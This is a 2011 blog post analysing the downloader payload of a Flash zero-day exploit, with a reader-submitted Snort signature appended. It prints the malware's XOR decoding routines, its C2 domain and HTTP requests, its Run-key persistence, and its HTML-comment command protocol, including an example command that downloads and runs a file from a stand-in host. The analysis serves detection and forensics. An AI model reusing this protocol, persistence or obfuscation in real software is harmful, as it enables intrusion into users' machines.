CVE-2011-0609 payload a.exe analysis
6 comments Mar 16, 2011 | Posted by hbojaxhi in Malware
- This is the analysis of the payload referenced at:
- http://contagiodump.blogspot.com/
- Ref: CVE-2011-0609 – Adobe Flash Player Zeroday
- The payload file was downloaded from:
ANALYSIS OF A.EXE
File Name: a.exe
File Size: 46048 bytes
MD5: 1e09970c9bf2ca08ee48f8b2e24f6c44
SHA1: 985b38b338a6b8371ea2179c4eda3563f21f7082
PE Time: 0x4D75F8E7 [Tue Mar 08 09:37:43 2011 UTC]
- This executable uses this working directory: C:\DOCUME~1\username\LOCALS~1\Temp\
- This executable file contains two MS CAB files embedded in it.
- It creates a file named ~FO1.tmp, and carves out the first CAB file located at file-offset 0x9BD4
- This file has the following characteristics:
File Name: ~FO1.tmp
File Size: 6156 bytes
MD5: 5d68ccb09314a6113eb733b1817a4b31
SHA1: a0053e36388bc90ee3731514c1bc697651f995cf
This CAB file contains the decoy XLS document that is shown to the user (i.e. this file is not malicious).
File Name: crsenvironscan2.xls
File Size: 29184 bytes
MD5: 1990c787e54a7e96e4cb550d83e9d3f4
SHA1: 4131b026fc2d0285ee4aac5000ea5a3b0455e78a
- This executable extracts file crsenvironscan2.xls, opens it, and deletes ~FO1.tmp.
- This executable then carves out the second CAB file, which is located at file-offset 0×1400 and saves it as ~FO2.tmp.
- This CAB file has the following characteristics:
File Name: ~FO2.tmp
File Size: 34772 bytes
MD5: 1363ee814f017188488f17fda837ac0f
SHA1: 8d2de8b4aa7a60675fccca619f94c6fac34ad2e3
-
- This CAB file contains an executable file named svchost.exe, which is a Downloader.
- This embedded executable has the following characteristics:
File Name: svchost.exe
File Size: 65536 bytes
MD5: 90993b5279365b204148e8b04edf477f
SHA1: 1d3de34f6282d66f689f978855fa5ebbb123d0b4
PE Time: 0x4D66062D [Thu Feb 24 07:18:05 2011 UTC]
-
- The analysis of svchost.exe is further down this document.
- File svchost.exe is extracted from the CAB file and executed, while file ~FO2.tmp is deleted.
- File a.exe then ensures that a filename derived from a call to GetTickCount does not exist in C:\RECYCLER\ folder, and then moves file a.exe in this new location using the MoveFileW call. Here is an example of the arguments passed to MoveFileW:
ExistingName = “C:\Documents and Settings\username\Desktop\a.exe”
NewName = “C:\RECYCLER\18653343.tmp”
- This executable (a.exe) then exits.
- Additional notes on a.exe:
- Checks for the presence of a process named excel.exe and if it exists it kills it. This done prior to opening the decoy document.
- It decodes the following data:
00403010 39 58 5B 15 4C 4D 4D 3F 40 41 42 43 44 45 46 47 9X[LMM?@ABCDEFG 00403020 48 49 4A 4B 98 CA 4E 4F 5C 49 52 53 25 HIJK˜ÊNO\IRS%
- Using this algorithm:
004010C0 /$ 33C0 XOR EAX, EAX 004010C2 |> 8A0D 10304000 /MOV CL, BYTE PTR DS:[403010] 004010C8 |. 8A90 11304000 |MOV DL, BYTE PTR DS:[EAX+403011] 004010CE |. 02C8 |ADD CL, AL 004010D0 |. 32D1 |XOR DL, CL 004010D2 |. 8890 11304000 |MOV BYTE PTR DS:[EAX+403011], DL 004010D8 |. 40 |INC EAX 004010D9 |. 83F8 1B |CMP EAX, 1B 004010DC |.^ 7C E4 \JL SHORT a.004010C2 004010DE \. C3 RETN
- The data decodes to:
00403010 39 61 61 2E 70 70 73 00 00 00 00 00 00 00 00 00 9aa.pps......... 00403020 00 00 00 00 D4 87 00 00 0C 18 00 00 25 ....Ô‡.....%
- This decoded data does not appear to be used (this is after placing a Hardware BP on access on this data).
ANALYSIS OF SVCHOST.EXE
File Name: svchost.exe
File Size: 65536 bytes
MD5: 90993b5279365b204148e8b04edf477f
SHA1: 1d3de34f6282d66f689f978855fa5ebbb123d0b4
PE Time: 0x4D66062D [Thu Feb 24 07:18:05 2011 UTC]
- Trojan decodes 0×287 bytes starting at file-offset 0xEB68 using this simple algorithm, which was also used by a.exe:
00402670 /$ 33C0 XOR EAX, EAX 00402672 |> 8A0D 68114100 /MOV CL, BYTE PTR DS:[411168] 00402678 |. 8A90 69114100 |MOV DL, BYTE PTR DS:[EAX+411169] 0040267E |. 02C8 |ADD CL, AL 00402680 |. 32D1 |XOR DL, CL 00402682 |. 8890 69114100 |MOV BYTE PTR DS:[EAX+411169], DL 00402688 |. 40 |INC EAX 00402689 |. 3D 87020000 |CMP EAX, 287 0040268E |.^ 7C E2 \JL SHORT svchost.00402672 00402690 \. C3 RETN
- The encoded data that decodes to the following appears to be configuration information:
00411168 E9 68 74 74 70 3A 2F 2F 6E 65 77 73 2E 67 6F 6F éhttp://news.goo 00411178 67 6C 65 75 70 64 61 74 65 73 65 72 76 69 63 65 gleupdateservice 00411188 73 2E 63 6F 6D 2F 68 74 6D 6C 2F 6C 6F 73 74 2E s.com/html/lost. 00411198 68 74 6D 6C 00 00 00 00 00 00 00 00 00 00 00 00 html............ 004111A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 004111B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 004111C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 004111D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 004111E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 004111F8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411208 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411218 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411228 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411238 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411248 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411258 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411268 00 00 00 00 01 00 00 00 3C 21 2D 2D 20 67 6F 6F .......<!-- goo 00411278 67 6C 65 5F 61 64 00 00 00 00 00 00 00 00 00 00 gle_ad.......... 00411288 00 00 00 00 00 00 00 00 20 68 65 69 67 68 74 20 ........ height 00411298 2D 2D 3E 00 00 00 00 00 00 00 00 00 00 00 00 00 -->............. 004112A8 00 00 00 00 00 00 00 00 61 64 5F 73 6C 6F 74 00 ........ad_slot. 004112B8 00 00 00 00 00 00 00 00 61 64 5F 77 69 64 74 68 ........ad_width 004112C8 00 00 00 00 00 00 00 00 61 64 5F 68 65 69 67 68 ........ad_heigh 004112D8 74 00 00 00 00 00 00 00 53 6F 66 74 77 61 72 65 t.......Software 004112E8 5C 4D 69 63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F \Microsoft\Windo 004112F8 77 73 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F ws\CurrentVersio 00411308 6E 5C 52 75 6E 00 00 00 00 00 00 00 00 00 00 00 n\Run........... 00411318 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411328 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411338 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411348 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411358 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411368 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411378 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411388 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00411398 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 004113A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 004113B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 004113C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 004113D8 00 00 00 00 00 00 00 00 41 64 6F 62 65 55 70 64 ........AdobeUpd 004113E8 61 74 65 00 00 00 00 00 02 00 00 00 00 00 00 00 ate............
- The Trojan sleeps for 1 minute before entrenching itself in the registry under:
- Software\Microsoft\Windows\CurrentVersion\Run
ValueName = AdobeUpdate
Set to: C:\Documents and Settings\username\Local Settings\Temp\svchost.exe
- The Trojan then sends the following GET request:
GET /html/lost.html HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) Host: news.googleupdateservices.com Connection: Keep-Alive
- At the time of this analysis domain news.googleupdateservices.com resolves to 127.0.0.1, so I do not have file lost.html for analysis. However, what follows describes what may be found in this file if anyone gets their hands on it.
- The Trojan creates a file named C:\DOCUME~1\username\LOCALS~1\Temp\X60E and places the content of lost.html into this file.
- The Trojan parses the HTML file data for the following content:
-
<!-- google_adINSTRUCTION height -->
-
- Valid values for INSTRUCTION are these three strings: ad_width, ad_height, or ad_slot.
- These three strings represent instructions that tell the Trojan what to do next.
- ad_slot tells the Trojan how many tens-minutes to sleep.
- So, an example may look like this:
-
<!-- google_adad_slot1 height -->
-
- Where 1 indicates the number of tens-minutes the Trojan will sleep.
- The ones-minute is always 4. So, in our example above the Trojan will sleep 14 minutes.
- So, if we had:
-
<!-- google_adad_slot10 height -->
-
- then the Trojan will sleep 104 minutes.
- ad_width causes the Trojan process to terminate.
- So, en example of this may look like:
-
<!-- google_adad_width height -->
-
- ad_height tells the Trojan to download and execute a file.
- So, an example of what file lost.html may contain may look like this:
-
<!-- google_adad_heighthttp://www.reallybad.com/Trojan2.jpg height -->
-
- The Trojan issues a GET request for the specified file:
GET /Trojan2.jpg HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E) Host: www.reallybad.com Connection: Keep-Alive
- File Trojan2.jpg is downloaded and saved in the Temp folder without its extension (so just as Trojan2).
- The downloaded file is expected to be Base64 encoded using the following custom alphabet:
- abhijstuDEFGHIvwxynopqr5678QRS9+/TUzklmVWXYZABCJKLMNOP01cdefg234
- The decoded version of Trojan2 is saved in the same directory as Trojan2.exe.
- Trojan2.exe is then executed as a child process of svchost.exe (I fed this Trojan an encoded version of bintext.exe):
- From the forensics perspective, none of the files in the Temp folder are deleted. In addition, any file that is downloaded is also cached on the system, so you will find a copy there as well.
Questions?
Like the ad_xxx stuff use. Clever.
Jim Chrisos kindly submitted the following SNORT signature for this Trojan:
alert tcp any [80,443] -> any any (msg: “Possible Linxder trojan command”; content:”|3c 21 2d 2d 20 67 6f 6f 67 6c 65 5f 61 64 61 64|”; sid:1xxxxxx; rev:2; reference:url,http://www.cyberesi.com/2011/03/16/cve-2011-0609-payload-a-exe-analysis/